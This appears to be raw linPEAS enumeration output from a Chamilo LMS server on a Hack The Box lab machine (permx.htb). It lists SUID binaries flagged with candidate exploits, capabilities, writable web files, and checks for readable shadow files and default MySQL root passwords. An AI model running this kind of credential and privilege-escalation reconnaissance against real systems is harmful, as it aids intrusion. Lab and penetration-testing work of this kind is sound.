Apache version: Server version: Apache/2.4.52 (Ubuntu)
Server built:   2024-04-10T17:45:18
httpd Not Found

Nginx version: nginx Not Found

/etc/apache2/mods-enabled/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-enabled/php7.4.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php7.4.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php7.4.conf:    SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-available/php7.4.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php7.4.conf:    SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Jun  7  2024 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Jun  7  2024 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 47 Jan 20  2024 /etc/apache2/sites-enabled/lms.permx.htb.permx.htb.conf -> ../sites-available/lms.permx.htb.permx.htb.conf
<VirtualHost *:80>
	ServerName lms.permx.htb
	ServerAdmin admin@permx.htb
	DocumentRoot /var/www/chamilo
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 33 Jan 20  2024 /etc/apache2/sites-enabled/permx.htb.conf -> ../sites-available/permx.htb.conf
<VirtualHost *:80>
	ServerName permx.htb
	ServerAlias www.permx.htb
	ServerAdmin admin@permx.htb
	DocumentRoot /var/www/html
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 Jan 20  2024 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
	Redirect / http://permx.htb
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>


-rw-r--r-- 1 root root 1361 Jan 20  2024 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
	Redirect / http://permx.htb
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 Jan 20  2024 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
	Redirect / http://permx.htb
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

-rw-r--r-- 1 root root 73002 Sep  2  2023 /etc/php/7.4/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 72600 Sep  2  2023 /etc/php/7.4/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rwxr-xr-x 1 www-data www-data 0 Aug 31  2023 /var/www/chamilo/app/Resources/public/assets/jquery-file-upload/server/php/php.ini
-rwxr-xr-x 1 www-data www-data 39 Nov  3  2022 /var/www/chamilo/vendor/knplabs/gaufrette/docker/php/php.ini
-rwxr-xr-x 1 www-data www-data 0 Aug 31  2023 /var/www/chamilo/web/assets/jquery-file-upload/server/php/php.ini



╔══════════╣ Searching docker files (limit 70)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/index.html#docker-breakout--privilege-escalation
-rwxr-xr-x 1 www-data www-data 345 Aug 31  2023 /var/www/chamilo/app/Resources/public/assets/blueimp-canvas-to-blob/docker-compose.yml
-rwxr-xr-x 1 www-data www-data 345 Aug 31  2023 /var/www/chamilo/app/Resources/public/assets/blueimp-load-image/docker-compose.yml
-rwxr-xr-x 1 www-data www-data 0 Aug 31  2023 /var/www/chamilo/app/Resources/public/assets/jquery-file-upload/server/php/Dockerfile
-rwxr-xr-x 1 www-data www-data 387 Jun 20  2022 /var/www/chamilo/vendor/guzzlehttp/guzzle/Dockerfile
-rwxr-xr-x 1 www-data www-data 1053 Nov  3  2022 /var/www/chamilo/vendor/knplabs/gaufrette/docker-compose.yml
-rwxr-xr-x 1 www-data www-data 174 Nov  3  2022 /var/www/chamilo/vendor/knplabs/gaufrette/docker/ftp/Dockerfile
-rwxr-xr-x 1 www-data www-data 183 May 27  2023 /var/www/chamilo/vendor/szymach/c-pchart/docker-compose.yml
-rwxr-xr-x 1 www-data www-data 345 Aug 31  2023 /var/www/chamilo/web/assets/blueimp-canvas-to-blob/docker-compose.yml
-rwxr-xr-x 1 www-data www-data 345 Aug 31  2023 /var/www/chamilo/web/assets/blueimp-load-image/docker-compose.yml
-rwxr-xr-x 1 www-data www-data 0 Aug 31  2023 /var/www/chamilo/web/assets/jquery-file-upload/server/php/Dockerfile

╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw-r--r-- 1 root root 1126 Feb 10  2023 /etc/mysql/mariadb.cnf
[client-server]
socket = /run/mysqld/mysqld.sock
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/

-rw------- 1 root root 544 Jan 20  2024 /etc/mysql/debian.cnf

╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Oct 11  2022 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
	comment = public archive
	path = /var/www/pub
	use chroot = yes
	lock file = /var/lock/rsyncd
	read only = yes
	list = yes
	uid = nobody
	gid = nogroup
	strict modes = yes
	ignore errors = no
	ignore nonreadable = yes
	transfer logging = no
	timeout = 600
	refuse options = checksum dry-run
	dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz


╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Jul  1  2024 /etc/pam.d
-rw-r--r-- 1 root root 2133 Jul 19  2023 /etc/pam.d/sshd
account    required     pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_keyinit.so force revoke
session    optional     pam_motd.so  motd=/run/motd.dynamic
session    optional     pam_motd.so noupdate
session    optional     pam_mail.so standard noenv # [1]
session    required     pam_limits.so
session    required     pam_env.so # [1]
session    required     pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so open


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Jun  7  2024 /etc/ldap

drwxr-xr-x 2 root root 4096 Jun  7  2024 /usr/share/php7.4-ldap/ldap

-rw-r--r-- 1 root root 0 Jan 20  2024 /var/lib/php/modules/7.4/apache2/enabled_by_maint/ldap

-rw-r--r-- 1 root root 0 Jan 20  2024 /var/lib/php/modules/7.4/cli/enabled_by_maint/ldap

-rw-r--r-- 1 root root 0 Jun  7  2024 /var/lib/php/modules/7.4/registry/ldap

drwxr-xr-x 2 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/main/auth/ldap


╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Jun  7  2024 /etc/apt/keyrings
drwxr-xr-x 2 root root 4096 Jun  7  2024 /usr/share/keyrings




╔══════════╣ Analyzing Backup Manager Files (limit 70)

-rwxr-xr-x 1 www-data www-data 2603 Aug 31  2023 /var/www/chamilo/main/extra/database.php
-rwxr-xr-x 1 www-data www-data 34969 Aug 31  2023 /var/www/chamilo/plugin/buycourses/database.php
    $paypalTable->addColumn('password', Types::STRING);
        'password' => '',
-rwxr-xr-x 1 www-data www-data 3157 Aug 31  2023 /var/www/chamilo/plugin/customcertificate/database.php
-rwxr-xr-x 1 www-data www-data 1943 Aug 31  2023 /var/www/chamilo/plugin/notebookteacher/database.php
-rwxr-xr-x 1 www-data www-data 29829 Aug 31  2023 /var/www/chamilo/plugin/sepe/database.php

╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 761 Nov 15  2021 /usr/share/bash-completion/completions/postfix


╔══════════╣ Analyzing Env Files (limit 70)
-rwxr-xr-x 1 www-data www-data 326 Nov  3  2022 /var/www/chamilo/vendor/knplabs/gaufrette/.env.dist
AWS_KEY=
AWS_SECRET=
AWS_BUCKET=
AZURE_ACCOUNT=
AZURE_KEY=
AZURE_CONTAINER=
FTP_HOST=ftp
FTP_PORT=21
FTP_USER=gaufrette
FTP_PASSWORD=gaufrette
FTP_BASE_DIR=/gaufrette
MONGO_URI=mongodb://mongodb:27017
MONGO_DBNAME=gridfs_test
SFTP_HOST=sftp
SFTP_PORT=22
SFTP_USER=gaufrette
SFTP_PASSWORD=gaufrette
SFTP_BASE_DIR=gaufrette

╔══════════╣ Analyzing Github Files (limit 70)
drwxr-xr-x 3 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/app/Resources/public/assets/blueimp-canvas-to-blob/.github
drwxr-xr-x 3 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/app/Resources/public/assets/blueimp-load-image/.github
drwxr-xr-x 3 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/app/Resources/public/assets/blueimp-tmpl/.github
drwxr-xr-x 2 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/app/Resources/public/assets/ckeditor/.github
drwxr-xr-x 3 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/app/Resources/public/assets/jquery-file-upload/.github
drwxr-xr-x 2 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/app/Resources/public/assets/multiselect-two-sides/.github
drwxr-xr-x 3 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/app/Resources/public/assets/select2/.github
drwxr-xr-x 3 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/plugin/h5p/cache-h5p/.github
drwxr-xr-x 2 www-data www-data 4096 Dec 30  2021 /var/www/chamilo/vendor/clue/graph/.github
drwxr-xr-x 2 www-data www-data 4096 Feb 21  2022 /var/www/chamilo/vendor/clue/stream-filter/.github
drwxr-xr-x 2 www-data www-data 4096 Jun  5  2020 /var/www/chamilo/vendor/doctrine/common/.github
drwxr-xr-x 3 www-data www-data 4096 Jun 20  2020 /var/www/chamilo/vendor/doctrine/persistence/.github
drwxr-xr-x 3 www-data www-data 4096 Jul 27  2023 /var/www/chamilo/vendor/doctrine/reflection/.github
drwxr-xr-x 3 www-data www-data 4096 Apr 17  2023 /var/www/chamilo/vendor/guzzlehttp/psr7/.github
drwxr-xr-x 3 www-data www-data 4096 Jul 29  2022 /var/www/chamilo/vendor/laminas/laminas-zendframework-bridge/.github
drwxr-xr-x 4 www-data www-data 4096 May  3  2023 /var/www/chamilo/vendor/mpdf/mpdf/.github
drwxr-xr-x 3 www-data www-data 4096 Mar  8  2023 /var/www/chamilo/vendor/myclabs/deep-copy/.github
drwxr-xr-x 2 www-data www-data 4096 Jan  7  2021 /var/www/chamilo/vendor/patchwork/utf8/.github
drwxr-xr-x 3 www-data www-data 4096 Mar 24  2021 /var/www/chamilo/vendor/php-xapi/client/.github
drwxr-xr-x 4 www-data www-data 4096 Feb 17  2022 /var/www/chamilo/vendor/phpoffice/phpword/.github
drwxr-xr-x 3 www-data www-data 4096 Oct 18  2021 /var/www/chamilo/vendor/swiftmailer/swiftmailer/.github
drwxr-xr-x 3 www-data www-data 4096 May 27  2023 /var/www/chamilo/vendor/szymach/c-pchart/.github
drwxr-xr-x 3 www-data www-data 4096 Sep 28  2022 /var/www/chamilo/vendor/twig/twig/.github
drwxr-xr-x 3 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/web/assets/blueimp-canvas-to-blob/.github
drwxr-xr-x 3 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/web/assets/blueimp-load-image/.github
drwxr-xr-x 3 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/web/assets/blueimp-tmpl/.github
drwxr-xr-x 2 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/web/assets/ckeditor/.github
drwxr-xr-x 3 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/web/assets/jquery-file-upload/.github
drwxr-xr-x 2 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/web/assets/multiselect-two-sides/.github
drwxr-xr-x 3 www-data www-data 4096 Aug 31  2023 /var/www/chamilo/web/assets/select2/.github




╔══════════╣ Analyzing FTP Files (limit 70)



-rw-r--r-- 1 root root 69 Sep  2  2023 /etc/php/7.4/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Jun  6  2024 /usr/share/php7.4-common/common/ftp.ini






╔══════════╣ Analyzing DNS Files (limit 70)
-rw-r--r-- 1 root root 826 Nov 15  2021 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 826 Nov 15  2021 /usr/share/bash-completion/completions/bind




╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Jan  6  2022 /etc/skel/.bashrc





-rw-r--r-- 1 root root 807 Jan  6  2022 /etc/skel/.profile




╔══════════╣ Analyzing Windows Files (limit 70)






















lrwxrwxrwx 1 root root 22 Jan 20  2024 /etc/alternatives/my.cnf -> /etc/mysql/mariadb.cnf
lrwxrwxrwx 1 root root 24 Jan 20  2024 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 83 Jul  1  2024 /var/lib/dpkg/alternatives/my.cnf

























-rwxr-xr-x 1 www-data www-data 5780 Aug 31  2023 /var/www/chamilo/web.config




╔══════════╣ Analyzing FreeIPA Files (limit 70)
drwxr-xr-x 2 root root 4096 Jul  1  2024 /usr/src/linux-headers-5.15.0-113/drivers/net/ipa




╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mariadb.conf.d/50-server.cnf' Mysql user: 
Found readable /etc/mysql/my.cnf
[client-server]
socket = /run/mysqld/mysqld.sock
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/

╔══════════╣ MySQL version
mysql  Ver 15.1 Distrib 10.6.18-MariaDB, for debian-linux-gnu (x86_64) using  EditLine wrapper


═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No
═╣ MySQL connection using root/NOPASS ................. No

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
gpg Not Found
netpgpkeys Not Found
netpgp Not Found

-rw-r--r-- 1 root root 396 Jan 20  2024 /etc/apt/trusted.gpg.d/ondrej-ubuntu-php.gpg
-rw-r--r-- 1 root root 2794 Mar 26  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 26  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 2899 Jul  4  2022 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 3023 Mar 26  2021 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 1150 Apr 23  2024 /usr/share/keyrings/ubuntu-pro-anbox-cloud.gpg
-rw-r--r-- 1 root root 2247 Apr 23  2024 /usr/share/keyrings/ubuntu-pro-cc-eal.gpg
-rw-r--r-- 1 root root 2274 Apr 23  2024 /usr/share/keyrings/ubuntu-pro-cis.gpg
-rw-r--r-- 1 root root 2236 Apr 23  2024 /usr/share/keyrings/ubuntu-pro-esm-apps.gpg
-rw-r--r-- 1 root root 2264 Apr 23  2024 /usr/share/keyrings/ubuntu-pro-esm-infra.gpg
-rw-r--r-- 1 root root 2275 Apr 23  2024 /usr/share/keyrings/ubuntu-pro-fips-preview.gpg
-rw-r--r-- 1 root root 2275 Apr 23  2024 /usr/share/keyrings/ubuntu-pro-fips.gpg
-rw-r--r-- 1 root root 2250 Apr 23  2024 /usr/share/keyrings/ubuntu-pro-realtime-kernel.gpg
-rw-r--r-- 1 root root 2235 Apr 23  2024 /usr/share/keyrings/ubuntu-pro-ros.gpg


╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)





-rw-r--r-- 1 root root 600 Jan 20  2024 /etc/ssh/ssh_host_dsa_key.pub
-rw-r--r-- 1 root root 172 Jan 20  2024 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 92 Jan 20  2024 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 564 Jan 20  2024 /etc/ssh/ssh_host_rsa_key.pub

UsePAM yes
══╣ Some certificates were found (out limited):
/etc/pki/fwupd-metadata/LVFS-CA.pem
/etc/pki/fwupd/LVFS-CA.pem
/etc/pollinate/entropy.ubuntu.com.pem
/etc/ssl/certs/ACCVRAIZ1.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM_SERVIDORES_SEGUROS.pem
/etc/ssl/certs/ANF_Secure_Server_Root_CA.pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068_2.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
4550PSTORAGE_CERTSBIN

══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
Include /etc/ssh/sshd_config.d/*.conf
KbdInteractiveAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem	sftp	/usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow


Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-shell-sessions
tmux 3.2a


/tmp/tmux-33



                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
                      ╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
-rwsr-xr-x 1 root root 47K Apr  9  2024 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 227K Apr  3  2023 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 35K Apr  9  2024 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 71K Feb  6  2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Apr  9  2024 /usr/bin/su
-rwsr-xr-x 1 root root 40K Feb  6  2024 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 59K Feb  6  2024 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 44K Feb  6  2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 72K Feb  6  2024 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 19K Feb 26  2022 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-x 1 root root 331K Jun 26  2024 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 35K Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

╔══════════╣ SGID
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
-rwxr-sr-x 1 root _ssh 287K Jun 26  2024 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 23K Feb  6  2024 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 39K Mar 23  2022 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 71K Feb  6  2024 /usr/bin/chage
-rwxr-sr-x 1 root utmp 15K Mar 24  2022 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 27K Jan 10  2024 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 23K Jan 10  2024 /usr/sbin/pam_extrausers_chkpwd

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls
files with acls in searched folders Not Found

╔══════════╣ Capabilities
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities
══╣ Current shell capabilities
CapInh:  0x0000000000000000=
CapPrm:  0x0000000000000000=
CapEff:	 0x0000000000000000=
CapBnd:  0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb:  0x0000000000000000=

╚ Parent process capabilities
CapInh:	 0x0000000000000000=
CapPrm:	 0x0000000000000000=
CapEff:	 0x0000000000000000=
CapBnd:	 0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb:	 0x0000000000000000=


Files with capabilities (limited to 50):
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep

╔══════════╣ Users with capabilities
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#ldso
/etc/ld.so.conf
Content of /etc/ld.so.conf:
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/libc.conf
  - /usr/local/lib
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
  - /usr/local/lib/x86_64-linux-gnu
  - /lib/x86_64-linux-gnu
  - /usr/lib/x86_64-linux-gnu

/etc/ld.so.preload
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#profiles-files
total 28
drwxr-xr-x   2 root root 4096 Jun  7  2024 .
drwxr-xr-x 102 root root 4096 Jul  1  2024 ..
-rw-r--r--   1 root root   96 Oct 15  2021 01-locale-fix.sh
-rw-r--r--   1 root root 1557 Feb 17  2020 Z97-byobu.sh
-rw-r--r--   1 root root  726 Nov 15  2021 bash_completion.sh
-rw-r--r--   1 root root 1107 Mar 23  2022 gawk.csh
-rw-r--r--   1 root root  757 Mar 23  2022 gawk.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd

╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root  3500 Jan 31  2023 sbin.dhclient
-rw-r--r-- 1 root root  3448 Mar 17  2022 usr.bin.man
-rw-r--r-- 1 root root  1687 Feb  8  2024 usr.bin.tcpdump
-rw-r--r-- 1 root root   730 Feb 10  2023 usr.sbin.mariadbd
-rw-r--r-- 1 root root  1592 Nov 16  2021 usr.sbin.rsyslogd

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
/var/www

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)

╔══════════╣ Readable files belonging to root and readable by me but not world readable

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files
uniq: write error: Broken pipe
/dev/mqueue
/dev/shm
/run/lock
/run/lock/apache2
/run/screen
/tmp
/tmp/linpeas.sh
/tmp/linpeas.txt
/tmp/tmux-33
/var/cache/apache2/mod_cache_disk
/var/crash
/var/lib/php/sessions
/var/tmp
/var/www/chamilo
/var/www/chamilo/.bowerrc
/var/www/chamilo/.codeclimate.yml
/var/www/chamilo/.htaccess
/var/www/chamilo/.php-cs-fixer.dist.php
/var/www/chamilo/.php-cs-fixer.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/.htaccess
/var/www/chamilo/app/AppKernel.php
/var/www/chamilo/app/DoctrineExtensions
/var/www/chamilo/app/DoctrineExtensions/DBAL
/var/www/chamilo/app/DoctrineExtensions/DBAL/Types
/var/www/chamilo/app/DoctrineExtensions/DBAL/Types/UTCDateTimeType.php
/var/www/chamilo/app/Migrations
/var/www/chamilo/app/Migrations/AbstractMigrationChamilo.php
/var/www/chamilo/app/Migrations/Schema
/var/www/chamilo/app/Migrations/Schema/V110
/var/www/chamilo/app/Migrations/Schema/V110/Version110.php
/var/www/chamilo/app/Migrations/Schema/V110/Version20150423093100.php
/var/www/chamilo/app/Migrations/Schema/V110/Version20150504182600.php
/var/www/chamilo/app/Migrations/Schema/V110/Version20150505132304.php
/var/www/chamilo/app/Migrations/Schema/V110/Version20150505142900.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Migrations/Schema/V111
/var/www/chamilo/app/Migrations/Schema/V111/Version111.php
/var/www/chamilo/app/Migrations/Schema/V111/Version20160302133200.php
/var/www/chamilo/app/Migrations/Schema/V111/Version20160304151300.php
/var/www/chamilo/app/Migrations/Schema/V111/Version20160315155700.php
/var/www/chamilo/app/Migrations/Schema/V111/Version20160330103045.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources
/var/www/chamilo/app/Resources/public
/var/www/chamilo/app/Resources/public/assets
/var/www/chamilo/app/Resources/public/assets/MathJax
/var/www/chamilo/app/Resources/public/assets/MathJax/.bower.json
/var/www/chamilo/app/Resources/public/assets/MathJax/CONTRIBUTING.md
/var/www/chamilo/app/Resources/public/assets/MathJax/LICENSE
/var/www/chamilo/app/Resources/public/assets/MathJax/MathJax.js
/var/www/chamilo/app/Resources/public/assets/MathJax/README.md
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources/public/assets/MathJax/config/AM_CHTML-full.js
/var/www/chamilo/app/Resources/public/assets/MathJax/config/AM_CHTML.js
/var/www/chamilo/app/Resources/public/assets/MathJax/config/AM_HTMLorMML-full.js
/var/www/chamilo/app/Resources/public/assets/MathJax/config/AM_HTMLorMML.js
/var/www/chamilo/app/Resources/public/assets/MathJax/config/AM_SVG-full.js
#)You_can_write_even_more_files_inside_last_directory

/var/www/chamilo/app/Resources/public/assets/MathJax/config/local/local.js
